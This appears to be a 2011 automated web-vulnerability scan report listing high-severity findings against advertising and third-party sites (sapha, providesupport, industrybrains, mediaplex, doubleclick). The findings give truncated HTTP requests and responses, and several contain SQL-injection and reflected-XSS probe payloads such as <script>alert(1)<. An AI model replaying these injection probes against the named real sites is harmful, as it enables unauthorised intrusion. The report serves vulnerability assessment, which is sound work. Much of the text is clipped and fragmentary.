GET /engine.php?ac=-111'%20OR Host: dce.sapha.com Proxy-Connection: keep-alive Referer: http://tours.sapha.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:05:31 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 494 </td></tr></table><b ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://dce.sapha.com |
Path: | /engine.php |
GET /engine.php?ac=-111'%20OR Host: dce.sapha.com Proxy-Connection: keep-alive Referer: http://tours.sapha.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:05:48 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 502 </td></tr></table><b ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://depot.activalive |
Path: | /app/deployment.php |
GET /app/deployment.php?id Host: depot.activalive.com Proxy-Connection: keep-alive Referer: http://www.firehost.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:18:34 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.13 Content-Length: 550 Connection: close Content-Type: text/javascript;charset _alc.monitoring.push(5221 _alc.__setStartDeptStatus _alc.__setStartDeptStatus delete _alc.__setStartDeptStatus _alc.setup(10596, 5930); _alc.handleInvite = _alc.rollDownInvite; _alc.handleInviteRej _a ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://dinclinx.com |
Path: | / |
GET /?s=103&e=0&t=21&f Host: dinclinx.com Proxy-Connection: keep-alive Referer: http://www.scmagazineus User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Connection: close Date: Fri, 06 May 2011 21:50:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-Control: no-cache, max-age=0, must-revalidate Pragma: no-cache Expires: Fri, 06 May 2011 21:50:11 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 69 // Error: Unknown parameter 79937<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://image.provide |
Path: | /cmd/advancedaccess |
GET /cmd9ce1e<script>alert(1)< Host: image.providesupport.com Proxy-Connection: keep-alive Referer: http://www.advancedaccess User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: vsid=pNpFk6ofuQKf |
HTTP/1.1 404 Not Found Content-Type: text/html Cache-Control: no-cache Pragma: no-cache Connection: close Date: Fri, 06 May 2011 18:40:14 GMT Content-Length: 545 <html> <body> <h2>Error 404: Not Found</h2> <pre> File: /cmd9ce1e<script>alert(1)< </pre> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://image.provide |
Path: | /js/advancedaccess/safe |
GET /jsce53d<script>alert(1)< Host: image.providesupport.com Proxy-Connection: keep-alive Referer: http://www.advancedaccess User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Content-Type: text/html Cache-Control: no-cache Pragma: no-cache Connection: close Date: Fri, 06 May 2011 18:39:59 GMT Content-Length: 574 <html> <body> <h2>Error 404: Not Found</h2> <pre> File: /jsce53d<script>alert(1)< </pre> <!-- ===================== ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://image.provide |
Path: | /js/advancedaccess/safe |
GET /js/advancedaccess4f0a6<a>a8f8fbe4fcc/safe-monitor.js?ps_h Host: image.providesupport.com Proxy-Connection: keep-alive Referer: http://www.advancedaccess User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Content-Type: text/html Cache-Control: no-cache Pragma: no-cache Connection: close Date: Fri, 06 May 2011 18:40:01 GMT Content-Length: 552 <html> <body> <h2>Error 404: Not Found</h2> <pre> Page: /js/advancedaccess4f0a6<a>a8f8fbe4fcc/safe-monitor.js?ps_h </pre> <!-- ========================= ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://img.mediaplex.com |
Path: | /content/0/15368/110724 |
GET /content/0/15368/110724 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://ads.betfair.com/ad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: svid=822523287793; __utmz=183366586 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 21:58:18 GMT Server: Apache Last-Modified: Wed, 27 Apr 2011 08:40:12 GMT ETag: "767c27-fa7-4a1e263917300 Accept-Ranges: bytes Content-Length: 4867 Content-Type: application/x-javascript var mojopro2 = window.location.protocol; if (mojopro2 == "https:") { mojosrc = "https://secure.img-cdn } else { mojosrc = "http://img-cdn.mediaplex ...[SNIP]... href="http://ads.betfair ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://img.mediaplex.com |
Path: | /content/0/15368/110724 |
GET /content/0/15368/110724 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://ads.betfair.com/ad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: svid=822523287793; __utmz=183366586 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 21:58:16 GMT Server: Apache Last-Modified: Wed, 27 Apr 2011 08:40:12 GMT ETag: "767c27-fa7-4a1e263917300 Accept-Ranges: bytes Content-Length: 4861 Content-Type: application/x-javascript var mojopro2 = window.location.protocol; if (mojopro2 == "https:") { mojosrc = "https://secure.img-cdn } else { mojosrc = "http://img-cdn.mediaplex ...[SNIP]... <mpcke/>'; if (mpcke == 1) { mpcclick = encodeURIComponent( mpck = "http://" + mpcclick; } else if (mpcke == 2) { mpcclick2 = encodeURIComponent( ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://img.mediaplex.com |
Path: | /content/0/15368/110724 |
GET /content/0/15368/110724 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://ads.betfair.com/ad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: svid=822523287793; __utmz=183366586 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 21:58:24 GMT Server: Apache Last-Modified: Wed, 27 Apr 2011 08:40:12 GMT ETag: "767c27-fa7-4a1e263917300 Accept-Ranges: bytes Content-Length: 4863 Content-Type: application/x-javascript var mojopro2 = window.location.protocol; if (mojopro2 == "https:") { mojosrc = "https://secure.img-cdn } else { mojosrc = "http://img-cdn.mediaplex ...[SNIP]... <a href="http://ads.betfair ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://img.mediaplex.com |
Path: | /content/0/15368/110724 |
GET /content/0/15368/110724 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://ads.betfair.com/ad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: svid=822523287793; __utmz=183366586 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 21:58:21 GMT Server: Apache Last-Modified: Wed, 27 Apr 2011 08:40:12 GMT ETag: "767c27-fa7-4a1e263917300 Accept-Ranges: bytes Content-Length: 4863 Content-Type: application/x-javascript var mojopro2 = window.location.protocol; if (mojopro2 == "https:") { mojosrc = "https://secure.img-cdn } else { mojosrc = "http://img-cdn.mediaplex ...[SNIP]... <mpvce/>'; if (mpvce == 1) { mpvclick = encodeURIComponent("http: mpvc = mpvclick; } else if (mpvce == 2) { mpvclick2 = encodeURIComponent("http: ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://img.mediaplex.com |
Path: | /content/0/15368/110724 |
GET /content/0/15368/110724 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://ads.betfair.com/ad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: svid=822523287793; __utmz=183366586 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 21:59:47 GMT Server: Apache Last-Modified: Tue, 29 Mar 2011 10:56:24 GMT ETag: "59ef15-e3-49f9ce9426600" Accept-Ranges: bytes Content-Length: 428 Content-Type: application/x-javascript document.write( "<iframe allowtransparency='true' src='http://www.streameye ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://img.mediaplex.com |
Path: | /content/0/15368/110724 |
GET /content/0/15368/110724 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://ads.betfair.com/ad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: svid=822523287793; __utmz=183366586 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 21:59:50 GMT Server: Apache Last-Modified: Tue, 29 Mar 2011 10:56:24 GMT ETag: "59ef15-e3-49f9ce9426600" Accept-Ranges: bytes Content-Length: 428 Content-Type: application/x-javascript document.write( "<iframe allowtransparency='true' src='http://www.streameye ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://img.mediaplex.com |
Path: | /content/0/15368/110724 |
GET /content/0/15368/110724 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://ads.betfair.com/ad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: svid=822523287793; __utmz=183366586 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 21:59:48 GMT Server: Apache Last-Modified: Wed, 02 Mar 2011 11:24:21 GMT ETag: "73a9bd-e4-49d7e27804340" Accept-Ranges: bytes Content-Length: 428 Content-Type: application/x-javascript document.write( "<iframe allowtransparency='true' src='http://www.streameye ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://img.mediaplex.com |
Path: | /content/0/15368/110724 |
GET /content/0/15368/110724 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://ads.betfair.com/ad User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: svid=822523287793; __utmz=183366586 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 21:59:51 GMT Server: Apache Last-Modified: Wed, 02 Mar 2011 11:24:21 GMT ETag: "73a9bd-e4-49d7e27804340" Accept-Ranges: bytes Content-Length: 429 Content-Type: application/x-javascript document.write( "<iframe allowtransparency='true' src='http://www.streameye ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://img.mediaplex.com |
Path: | /content/0/16228/124632 |
GET /content/0/16228/124632 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.scmagazineus User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: svid=822523287793; __utmz=183366586 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:50:41 GMT Server: Apache Last-Modified: Fri, 11 Mar 2011 22:17:39 GMT ETag: "555379-d9c-49e3c5474a6c0 Accept-Ranges: bytes Content-Length: 4298 Content-Type: application/x-javascript (function(){ var protocol = window.location.protocol; if (protocol == "https:") { protocol = "https://secure.img-cdn } else { protocol = "http://img-cdn.mediaplex }; ...[SNIP]... <mpcke/>'; if (mpcke == 1) { mpcclick = encodeURIComponent( mpck = "http://" + mpcclick; } else if (mpcke == 2) { mpcclick2 = encodeURIComponent( mpck = "h ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://img.mediaplex.com |
Path: | /content/0/16228/124632 |
GET /content/0/16228/124632 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.scmagazineus User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: svid=822523287793; __utmz=183366586 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:50:43 GMT Server: Apache Last-Modified: Fri, 11 Mar 2011 22:17:39 GMT ETag: "555379-d9c-49e3c5474a6c0 Accept-Ranges: bytes Content-Length: 4304 Content-Type: application/x-javascript (function(){ var protocol = window.location.protocol; if (protocol == "https:") { protocol = "https://secure.img-cdn } else { protocol = "http://img-cdn.mediaplex }; ...[SNIP]... <a href="http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://img.mediaplex.com |
Path: | /content/0/16228/124632 |
GET /content/0/16228/124632 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.scmagazineus User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: svid=822523287793; __utmz=183366586 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:51:23 GMT Server: Apache Last-Modified: Fri, 11 Mar 2011 22:17:39 GMT ETag: "555379-d9c-49e3c5474a6c0 Accept-Ranges: bytes Content-Length: 4300 Content-Type: application/x-javascript (function(){ var protocol = window.location.protocol; if (protocol == "https:") { protocol = "https://secure.img-cdn } else { protocol = "http://img-cdn.mediaplex }; ...[SNIP]... <a href="http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://img.mediaplex.com |
Path: | /content/0/16228/124632 |
GET /content/0/16228/124632 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.scmagazineus User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: svid=822523287793; __utmz=183366586 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:51:21 GMT Server: Apache Last-Modified: Fri, 11 Mar 2011 22:17:39 GMT ETag: "555379-d9c-49e3c5474a6c0 Accept-Ranges: bytes Content-Length: 4300 Content-Type: application/x-javascript (function(){ var protocol = window.location.protocol; if (protocol == "https:") { protocol = "https://secure.img-cdn } else { protocol = "http://img-cdn.mediaplex }; ...[SNIP]... <mpvce/>'; if (mpvce == 1) { mpvclick = encodeURIComponent("http: mpvc = mpvclick; } else if (mpvce == 2) { mpvclick2 = encodeURIComponent("http: ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://img.mediaplex.com |
Path: | /content/0/16228/124632 |
GET /content/0/16228/124632 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.scmagazineus User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: svid=822523287793; __utmz=183366586 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 21:50:52 GMT Server: Apache Last-Modified: Fri, 11 Mar 2011 22:18:20 GMT ETag: "55537c-d92-49e3c56e64300 Accept-Ranges: bytes Content-Length: 4280 Content-Type: application/x-javascript (function(){ var protocol = window.location.protocol; if (protocol == "https:") { protocol = "https://secure.img-cdn } else { protocol = "http://img-cdn.mediaplex }; ...[SNIP]... <mpcke/>'; if (mpcke == 1) { mpcclick = encodeURIComponent( mpck = "http://" + mpcclick; } else if (mpcke == 2) { mpcclick2 = encodeURIComponent( mpck = "ht ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://img.mediaplex.com |
Path: | /content/0/16228/124632 |
GET /content/0/16228/124632 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.scmagazineus User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: svid=822523287793; __utmz=183366586 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 21:50:54 GMT Server: Apache Last-Modified: Fri, 11 Mar 2011 22:18:20 GMT ETag: "55537c-d92-49e3c56e64300 Accept-Ranges: bytes Content-Length: 4286 Content-Type: application/x-javascript (function(){ var protocol = window.location.protocol; if (protocol == "https:") { protocol = "https://secure.img-cdn } else { protocol = "http://img-cdn.mediaplex }; ...[SNIP]... <a href="http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://img.mediaplex.com |
Path: | /content/0/16228/124632 |
GET /content/0/16228/124632 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.scmagazineus User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: svid=822523287793; __utmz=183366586 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 21:51:52 GMT Server: Apache Last-Modified: Fri, 11 Mar 2011 22:18:20 GMT ETag: "55537c-d92-49e3c56e64300 Accept-Ranges: bytes Content-Length: 4282 Content-Type: application/x-javascript (function(){ var protocol = window.location.protocol; if (protocol == "https:") { protocol = "https://secure.img-cdn } else { protocol = "http://img-cdn.mediaplex }; ...[SNIP]... <a href="http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://img.mediaplex.com |
Path: | /content/0/16228/124632 |
GET /content/0/16228/124632 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.scmagazineus User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: svid=822523287793; __utmz=183366586 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 21:51:50 GMT Server: Apache Last-Modified: Fri, 11 Mar 2011 22:18:20 GMT ETag: "55537c-d92-49e3c56e64300 Accept-Ranges: bytes Content-Length: 4282 Content-Type: application/x-javascript (function(){ var protocol = window.location.protocol; if (protocol == "https:") { protocol = "https://secure.img-cdn } else { protocol = "http://img-cdn.mediaplex }; ...[SNIP]... <mpvce/>'; if (mpvce == 1) { mpvclick = encodeURIComponent("http: mpvc = mpvclick; } else if (mpvce == 2) { mpvclick2 = encodeURIComponent("http: ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://iqavu79a908u5 |
Path: | /gadgets/ifr |
GET /gadgets/ifr?url=http:/ Host: iqavu79a908u5vcecp0p Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 400 Bad Request P3P: CP="CAO PSA OUR" Content-Type: text/html; charset=UTF-8 Date: Fri, 06 May 2011 21:11:26 GMT Expires: Fri, 06 May 2011 21:11:26 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Content-Length: 136 Unable to retrieve spec for http://www.google.com alert(1)//2a6a5889652. HTTP error 400 |
Severity: | High |
Confidence: | Certain |
Host: | http://iv.doubleclick.net |
Path: | /adi/nbcu.lim.har/news |
GET /adi/nbcu.lim.har/news Host: iv.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.nbcconnecticut User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 478 Cache-Control: no-cache Pragma: no-cache Date: Sat, 07 May 2011 22:38:11 GMT Expires: Sat, 07 May 2011 22:38:11 GMT <html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_top" href="http://iv ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://iv.doubleclick.net |
Path: | /adi/nbcu.lim.har/pid_ap |
GET /adi/nbcu.lim.har/pid_ap Host: iv.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.nbcconnecticut User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 478 Cache-Control: no-cache Pragma: no-cache Date: Sat, 07 May 2011 22:38:04 GMT Expires: Sat, 07 May 2011 22:38:04 GMT <html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_top" href="http://iv ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://iv.doubleclick.net |
Path: | /adj/nbcu.lim.har/hp |
GET /adj/nbcu.lim.har/hp Host: iv.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.nbcconnecticut User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 316 Cache-Control: no-cache Pragma: no-cache Date: Sat, 07 May 2011 22:37:36 GMT Expires: Sat, 07 May 2011 22:37:36 GMT document.write('<a target="_top" href="http://iv ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://iv.doubleclick.net |
Path: | /adj/nbcu.lim.har/news |
GET /adj/nbcu.lim.har/news Host: iv.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.nbcconnecticut User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 327 Cache-Control: no-cache Pragma: no-cache Date: Sat, 07 May 2011 22:38:18 GMT Expires: Sat, 07 May 2011 22:38:18 GMT document.write('<a target="_top" href="http://iv ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://iv.doubleclick.net |
Path: | /adj/nbcu.lim.har/pid_ap |
GET /adj/nbcu.lim.har/pid_ap Host: iv.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.nbcconnecticut User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 327 Cache-Control: no-cache Pragma: no-cache Date: Sat, 07 May 2011 22:38:13 GMT Expires: Sat, 07 May 2011 22:38:13 GMT document.write('<a target="_top" href="http://iv ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jlinks.indust |
Path: | /jsct |
GET /jsct?sid=918&ct Host: jlinks.industrybrains.com Proxy-Connection: keep-alive Referer: http://www.scmagazineus User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Connection: close Date: Fri, 06 May 2011 21:50:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-Control: no-cache, max-age=0, must-revalidate Pragma: no-cache Expires: Fri, 06 May 2011 21:50:08 GMT Content-Type: application/x-javascript Content-Length: 85 // Error: Unknown old section SCMAGAZINE_ROS9b3c3<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://jlinks.indust |
Path: | /jsct |
GET /jsct?sid=918&ct Host: jlinks.industrybrains.com Proxy-Connection: keep-alive Referer: http://www.scmagazineus User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
